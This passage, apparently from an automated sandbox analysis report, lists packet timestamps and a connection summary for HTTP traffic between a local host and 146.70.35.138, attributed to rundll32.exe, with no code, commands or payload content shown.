Apr 23, 2022 08:12:20.370218039 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.370239973 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.370259047 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.370285988 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.393351078 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.396121025 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410522938 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410547972 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410562038 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410579920 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410598040 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410609007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410725117 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410767078 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410773993 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410815001 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410842896 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410861969 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410912037 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410948038 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410972118 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410988092 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411020041 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.411101103 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411129951 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411148071 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411159039 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411170959 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.411206007 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.411315918 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.412249088 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49766 | 146.70.35.138 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 23, 2022 08:12:19.910176992 CEST | 1224 | OUT | |
Apr 23, 2022 08:12:20.288152933 CEST | 1238 | IN | |